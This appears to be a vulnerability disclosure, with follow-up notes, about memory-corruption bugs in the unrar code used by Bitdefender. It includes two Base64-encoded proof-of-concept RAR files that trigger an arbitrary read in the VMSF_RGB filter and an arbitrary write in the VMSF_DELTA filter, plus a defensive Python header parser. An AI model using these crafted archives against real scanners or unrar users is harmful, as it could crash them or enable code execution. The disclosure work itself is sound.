Bitdefender crashes when parsing malformed RAR files that target vulnerabilities in the code of unrar 4.2.4, which was obsoleted in 2013 with the release of 5.0.4.
Multiple vulnerabilities exist in the old rarvm.cpp; among others a read-from-arbitrary-address in the VMSF_RGB filter, and a write-to-arbitrary-address in the VMSF_DELTA filter. The code appears to be identical to the code described on pages 10 and 11 of Tavis Ormandy's 2012 report on memory corruptions in Sophos AV (https://lock.cmpxchg8b.com/sophailv2.pdf).
This report includes two example files, one to trigger the VMSF_DELTA near-arbitrary write, and one to trigger the VMSF_RGB near-arbitrary read.
It is almost certain that these vulnerabilities can be turned into arbitrary code execution.
Given that many other fixes have happened to the unrar code base since 4.2.4, it is highly recommended that you upgrade the code as soon as possible and introduce measures to monitor security bugs in third-party code that you include.
Base64-encoded RAR file to trigger the VMSF_DELTA issue:
UmFyIRoHAPlOcwAADgAAAAAAAAAAMAh0AAAmAI4AAAAAAAAAAhBBUiEAAAAAHQAGAAAAACBzdGRv
dXQgIVUMzRDNmBGByDAda+AXaSv4KvQr1K/oejL05mXmXmww5tEk8gA9k8nmieyeyeswuOR6cx69
a2Hd6zQwu3aoMDDwMEswADAAMD4P938w+dydoRFwAmwAAAAAvv////+/////+9W3QFgAAQAGAAAA
Ooimhd12AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Base64-encoded RAR file to trigger the VMSF_RGB issue:
UmFyIRoHAPlOcwAADgAAAAAAAAAANNx0AAAmAAYBAAAAAAAAAhBBUiEAAAAAHQAGAAAAACBzdGRv
dXQgIVUMzRDNmBGByDAda+AXaSv4KvQr1K/oejL05mXmXmww5tEk8gA9k8nmieyeyeswuOR6cx69
a2Hd6zQwu3aoMDDwMEswADAAMD4P938w+dydoRFwCewAAAAAv71bdAG/////+9W3QFgAAQAGAAAB
KuksTlfcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
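As an added triage aid (this is not code from the report, from Project Zero, from Bitdefender or from unrar), the following Python decodes the two attached archives and walks their RAR 1.5 to 4.x block headers. It is based on the documented layout of that container format (7-byte block header, FILE_HEAD fields in fixed order, HEAD_CRC as the low 16 bits of CRC32 over the rest of the header); the function and constant names are my own. The point it makes is how a defender can tell, from the headers alone, which entries are handed to the RAR 3.x decoder (UNP_VER 29), the only decoder that runs the rarvm.cpp filter stage where VMSF_RGB and VMSF_DELTA live.

```python
import base64
import struct
import zlib

# The two proof-of-concept archives attached to the report, copied verbatim
# from the Base64 text above.
VMSF_DELTA_B64 = """
UmFyIRoHAPlOcwAADgAAAAAAAAAAMAh0AAAmAI4AAAAAAAAAAhBBUiEAAAAAHQAGAAAAACBzdGRv
dXQgIVUMzRDNmBGByDAda+AXaSv4KvQr1K/oejL05mXmXmww5tEk8gA9k8nmieyeyeswuOR6cx69
a2Hd6zQwu3aoMDDwMEswADAAMD4P938w+dydoRFwAmwAAAAAvv////+/////+9W3QFgAAQAGAAAA
Ooimhd12AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
"""

VMSF_RGB_B64 = """
UmFyIRoHAPlOcwAADgAAAAAAAAAANNx0AAAmAAYBAAAAAAAAAhBBUiEAAAAAHQAGAAAAACBzdGRv
dXQgIVUMzRDNmBGByDAda+AXaSv4KvQr1K/oejL05mXmXmww5tEk8gA9k8nmieyeyeswuOR6cx69
a2Hd6zQwu3aoMDDwMEswADAAMD4P938w+dydoRFwCewAAAAAv71bdAG/////+9W3QFgAAQAGAAAB
KuksTlfcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
"""

RAR4_SIGNATURE = b"Rar!\x1a\x07\x00"   # marker block of the RAR 1.5-4.x format
FILE_HEAD = 0x74
LONG_BLOCK = 0x8000                     # header is followed by ADD_SIZE data bytes
BLOCK_NAMES = {0x72: "MARK_HEAD", 0x73: "MAIN_HEAD", 0x74: "FILE_HEAD",
               0x7A: "NEWSUB_HEAD", 0x7B: "ENDARC_HEAD"}


def decode_report_blob(text):
    """Turn the wrapped Base64 from the report into raw archive bytes."""
    compact = "".join(text.split())
    # Drop a trailing partial quartet (a mis-copied line) instead of failing.
    compact = compact[: len(compact) - len(compact) % 4]
    return base64.b64decode(compact)


def header_crc_ok(header):
    """HEAD_CRC is the low 16 bits of CRC32 over the header bytes after it."""
    stored = struct.unpack_from("<H", header, 0)[0]
    return (zlib.crc32(header[2:]) & 0xFFFF) == stored


def parse_rar4(data):
    """Walk the block headers; return one dict per block (no decompression)."""
    if not data.startswith(RAR4_SIGNATURE):
        raise ValueError("missing RAR 1.5-4.x signature")
    blocks, off = [], 0
    while off + 7 <= len(data):
        crc, btype, flags, size = struct.unpack_from("<HBHH", data, off)
        if size < 7:
            # Header cannot be shorter than its fixed part: stop instead of spinning.
            blocks.append({"offset": off, "type": "INVALID", "header_size": size,
                           "data_size": 0, "crc_ok": False})
            break
        header = data[off:off + size]
        block = {"offset": off, "type": BLOCK_NAMES.get(btype, "0x%02x" % btype),
                 "flags": flags, "header_size": size,
                 "crc_ok": header_crc_ok(header), "data_size": 0}
        if len(header) < size:
            block["truncated"] = True
            blocks.append(block)
            break
        if btype == FILE_HEAD and size >= 32:
            # PACK_SIZE UNP_SIZE HOST_OS FILE_CRC FTIME UNP_VER METHOD NAME_SIZE ATTR,
            # then the name. (64-bit size extension, flag 0x0100, not handled here.)
            (pack_size, unp_size, host_os, file_crc, ftime, unp_ver, method,
             name_size, attr) = struct.unpack_from("<IIBIIBBHI", header, 7)
            name = header[32:32 + name_size].split(b"\0")[0].decode("latin-1", "replace")
            block.update({"file_name": name, "pack_size": pack_size,
                          "unp_size": unp_size, "host_os": host_os,
                          "file_crc": file_crc, "unp_ver": unp_ver,
                          "method_raw": method, "attr": attr,
                          "data_size": pack_size})
        elif flags & LONG_BLOCK and size >= 11:
            block["data_size"] = struct.unpack_from("<I", header, 7)[0]
        blocks.append(block)
        off += size + block["data_size"]
    return blocks


def entries_reaching_rar3_vm(blocks):
    """Names of entries decoded by the RAR 3.x algorithm (UNP_VER 29), i.e. the
    decoder whose filter stage is rarvm.cpp. METHOD 0x30 means 'stored' and
    bypasses the decoder entirely."""
    return [b["file_name"] for b in blocks
            if b["type"] == "FILE_HEAD" and b.get("unp_ver", 0) >= 29
            and b.get("method_raw") != 0x30]


if __name__ == "__main__":
    for label, blob in (("VMSF_DELTA sample", VMSF_DELTA_B64),
                        ("VMSF_RGB sample", VMSF_RGB_B64)):
        blocks = parse_rar4(decode_report_blob(blob))
        print(label)
        for b in blocks:
            print("  %-12s off=%-4d hdr=%-3d data=%-4d crc_ok=%s" % (
                b["type"], b["offset"], b["header_size"], b["data_size"], b["crc_ok"]))
        print("  entries reaching rarvm.cpp:", entries_reaching_rar3_vm(blocks))
```

Both attachments parse as marker block, main header and a single FILE_HEAD named "stdout" with UNP_VER 29 and a non-stored method, so each one is routed into the RAR 3.x decoder on any scanner that still carries the affected rarvm.cpp; the header walk alone does not say which VMSF filter the compressed stream requests, since filters are encoded inside the Huffman-coded data.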
This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public.
Bitdefender crashes when parsing malformed RAR files. These RAR files were
crafted to target vulnerabilities in unrar 4.2.4 - and initially we suspected
that Bitdefender was linking outdated unrar code. Further investigation on
Bitdefender's side showed, though, that they are up-to-date with their
unrar code, and that one of the two targeted vulnerabilities was never fixed
in upstream unrar.
Please see https://bugs.chromium.org/p/project-zero/issues/detail?id=1286 for
the upstream bug report and further details.
Special thanks to Bitdefender for their quick turnaround and thorough investigation
of the issue, and alerting us that one of the two issues reported by us persisted
in upstream unrar.
A crash was reported to Bitdefender caused by malformed RAR files which were
crafted to target vulnerabilities in unrar 4.2.4 - and initially we suspected
that Bitdefender was linking outdated unrar code.
Further investigation on Bitdefender's side showed, though, that they are
up-to-date with their unrar code, and that one of the two targeted vulnerabilities
was never fixed in upstream unrar. Every other user of unrar is likely also
affected.
Please see https://bugs.chromium.org/p/project-zero/issues/detail?id=1286 for
the upstream bug report and further details.
Special thanks to Bitdefender for their quick turnaround and thorough investigation
of the issue, and alerting us that one of the two issues reported by us persisted
in upstream unrar as well as shipping patches quickly. After our initial report,
Bitdefender embarked on an audit of unrar code and discovered a further vulnerability
in the same area of the code which permitted memory corruption by providing a
malformed VMSF_AUDIO filter. They quickly reported this to upstream, and the new
release should fix this issue as well. Great response!
It turns out that Bitdefender was using the current version of unrar, but that for some unknown reason, the VMSF_DELTA issue had persisted in upstream unrar to this day. More details here:
https://bugs.chromium.org/p/project-zero/issues/detail?id=1286
Thanks to Bitdefender for alerting us to the fact that upstream RAR is affected.